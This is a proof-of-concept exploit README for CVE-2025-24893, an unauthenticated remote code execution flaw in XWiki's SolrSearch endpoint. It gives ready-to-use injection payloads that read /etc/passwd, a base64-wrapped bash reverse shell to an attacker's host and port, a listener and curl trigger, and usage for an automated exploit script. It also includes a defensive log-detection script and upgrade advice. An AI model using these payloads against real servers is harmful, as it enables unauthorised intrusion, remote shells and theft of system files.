PoC details: ed65f083c7ebc8e16d3336e7596e3791fffe091a

Source
Related vulnerability
Title: XWiki Platform security vulnerability (CVE-2025-24893)
Description: XWiki Platform is an open-source wiki platform from XWiki for building web collaboration applications. XWiki Platform contains a security vulnerability: any guest user can achieve remote code execution through a request to SolrSearch.
Description
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in XWiki, a popular open-source enterprise wiki platform.
Introduction
# CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki  

## 0  Table of Contents
1. [Summary](#1-summary)
2. [Vulnerability Details](#2-vulnerability-details)
3. [Affected Versions](#3-affected-versions)
5. [Proof of Concept](#5-proof-of-concept)
   * 5.1 [Build the payload](#51-build-the-payload)
   * 5.2 [Manual exploitation](#52-manual-exploitation)
   * 5.3 [Automated exploit](#53-automated-exploit)
6. [Mitigation](#6-mitigation)
7. [Credits & References](#7-credits--references)

---

## 1  Summary <a name="1-summary"></a>

* **CVE:** 2025-24893  
* **Component:** `SolrSearch` macro (XWiki UI)  
* **Severity:** 9.8 / CRITICAL (CVSS 3.1)  
* **Attack vector:** Unauthenticated HTTP GET  
* **Impact:** Arbitrary Groovy execution → system-level RCE (permissions of the Jetty/Tomcat user)  

The `/xwiki/bin/get/Main/SolrSearch` endpoint concatenates untrusted `text=` input
straight into a Freemarker template.  
By prematurely closing the template and opening a new `{{groovy}} … {{/groovy}}`
block, an attacker executes arbitrary Groovy code without authentication.

---

## 2  Vulnerability Details <a name="2-vulnerability-details"></a>

```
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<<<USER-DATA>>> HTTP/1.1
```

`SolrSearch` should embed the supplied text as plain content, but the macro
handler **fails to escape `}}}`**, so the following happens:

1. `}}}` closes the current Freemarker block.
2. The attacker opens a **new macro**:

   ```xwiki
   {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
   ```

   * `async=false` forces synchronous execution (works even for guests).

3. Groovy runs with the permissions of the XWiki JVM process.

A minimal PoC that prints `/etc/passwd`:

```text
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
```

URL-encoded variant (spaces → `%20`, braces → `%7B/%7D`, etc.):

```
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
```
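As an added detection example (not part of the original write-up), the following Python flags access-log requests to the SolrSearch endpoint whose `text` parameter carries the `}}}{{…` template-breakout pattern described above, after undoing nested percent-encoding. The log lines are constructed samples, and the combined-log request regex is an assumption about the web server's log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed Apache/Nginx combined-format request token: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Macro close followed by a new macro opener, e.g. `}}}{{async ...}}{{groovy}}`
INJECT_RE = re.compile(r"\}\}\}\s*\{\{\s*([A-Za-z]+)")


def decode_param(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def detect_solrsearch_injection(log_line: str):
    """Return the injected macro name (e.g. 'async', 'groovy') for a SolrSearch
    request whose `text` parameter breaks out of the template, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if "solrsearch" not in parts.path.lower():
        return None
    # parse_qs percent-decodes once; decode_param handles any further layers.
    for raw in parse_qs(parts.query).get("text", []):
        hit = INJECT_RE.search(decode_param(raw))
        if hit:
            return hit.group(1).lower()
    return None


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2025:10:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Mar/2025:10:00:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(1)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 128',
    '10.0.0.9 - - [01/Mar/2025:10:00:03 +0000] "GET /xwiki/bin/view/Main/WebHome?text=%7d%7d%7d%7b%7bgroovy%7d%7d HTTP/1.1" 200 4096',
]


def scan(lines):
    """Return (line_index, macro) for every flagged SolrSearch request."""
    return [(i, macro) for i, line in enumerate(lines)
            if (macro := detect_solrsearch_injection(line))]
```

Only the SolrSearch endpoint is matched, so the third sample (same pattern on a different page) is deliberately left to other rules.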

---

## 3  Affected Versions <a name="3-affected-versions"></a>

| Branch   | Fixed in                                   | Vulnerable ≤                     |
| -------- | ------------------------------------------ | -------------------------------- |
| 15.x     | **15.10.11**                               | 15.10.10 (and all 15.9 / 15.8 …) |
| 14.x LTS | **14.10.17**                               | 14.10.16                         |
| 13 / 12  | **Not maintained** – all remain vulnerable |                                  |

*(source: [OffSec advisory](https://www.offsec.com/blog/cve-2025-24893/) & XWiki
SEC-S 2025-02)*

![endpoint](images/XWiki_ver.png)

---

## 5  Proof of Concept <a name="5-proof-of-concept"></a>

### 5.1  Build the payload <a name="51-build-the-payload"></a>

```bash
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444

# 1.   one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"

# 2.   Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)

# 3.   wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'

# 4.   URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
```

### 5.2  Manual exploitation <a name="52-manual-exploitation"></a>

```bash
# start listener
sudo ncat -lvnp 4444

# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
```

### 5.3  Automated exploit <a name="53-automated-exploit"></a>

`xwiki_solr_rce.py` ships in `exploit/` (see code block below).

```bash
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>
```
where
```
<TARGET URL> - URL including http:// or https://
```
*(pass `-c "id"` to run an arbitrary command instead of a shell)*
![exploit](images/running_exploit.png)
![revshell](images/reverse_shell.png)

---

## 6  Mitigation <a name="6-mitigation"></a>

* **Upgrade** to **15.10.11** / **14.10.17** or later
* Temporary workaround: disable the macro

```properties
# /etc/xwiki/xwiki.properties
solr.search.enabled = false
```

---

## 7  Credits & References <a name="7-credits--references"></a>

* OffSec Research: “Unauth RCE in XWiki” – 20 Feb 2025
* NVD entry: [https://nvd.nist.gov/vuln/detail/CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
* [Exploit-DB #52136](https://www.exploit-db.com/exploits/52136)

> Research & PoC: **DeX1d**

---

> Disclaimer: For educational use only. Running this against systems you do not own is illegal.
File snapshot

```
[4.0K] /data/pocs/ed65f083c7ebc8e16d3336e7596e3791fffe091a
├── [2.0K] CVE-2025-24893.py
├── [4.0K] images
│   ├── [ 32K] reverse_shell.png
│   ├── [ 33K] running_exploit.png
│   └── [153K] XWiki_ver.png
└── [4.5K] README.md

1 directory, 5 files
```